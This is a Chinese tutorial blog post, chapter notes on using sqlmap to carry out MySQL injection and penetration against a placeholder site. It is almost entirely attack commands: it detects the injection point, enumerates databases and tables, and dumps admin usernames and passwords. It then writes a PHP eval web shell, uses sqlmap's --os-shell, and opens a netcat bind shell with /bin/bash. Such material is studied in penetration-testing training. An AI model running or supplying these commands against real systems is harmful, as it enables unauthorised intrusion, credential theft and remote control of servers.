• sqlmap从入门到精通-第五章-5-3 使用sqlmap进行MySQL注入并渗透


    5.3 使用sqlmap进行MySQL注入并渗透

    这一小节没什么东西,作者前面都讲过,这里算是基本都是重复,大家看看,作为一个备忘录吧

    5.3.1 检测SQL注入点

    sqlmap.py -u "http://www.xx.com/index.php?id=3"

    5.3.2 获取当前数据库信息

    sqlmap.py -u "http://www.xx.com/index.php?id=3" --current-db

    5.3.3 获取当前数据库表

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx --tables

    5.3.4 获取表列和数据

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx -T admin --columns

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx -T admin -C id,username,password --dump

    5.3.5 获取webshell

    1. 获取网站信息

    --os-shell

    2. 获取webshell

    echo "<?php @eval($_POST['bmfx']);?>" > bmfx.php

    5.3.6 总结及技巧

    1. 自动提交参数和智能进行注入 sqlmap -u url --batch --smart

    2. 获取所有信息 sqlmap -u url --batch --smart -a

    3. 导出数据库 sqlmap -u url --dump-all

    4. 直接连接数据库 sqlmap -d "mysql://root:root@127.0.0.1:3306/bmfx" -f --banner --dbs --users

    这里如果是root权限可以直接使用--os-shell

    5. 直接获取webshell sqlmap -u url --os-shell

    6. 在Linux反弹shell

    nc -l -p 9988 -e /bin/bash

    nc xxxxx 9988


     
  • 相关阅读:
    [论文复现笔记]Im2Struct
    深度学习踩坑
    Matlab问题汇总
    Linux网络服务
    探索Blender
    [每日挖坑]20200728
    Ubuntu重启之后显卡挂了
    3D视觉知识点
    [每日挖坑]20200727
    遥感影像相关知识
  • 原文地址:https://www.cnblogs.com/autopwn/p/13279692.html
Copyright © 2020-2023  润新知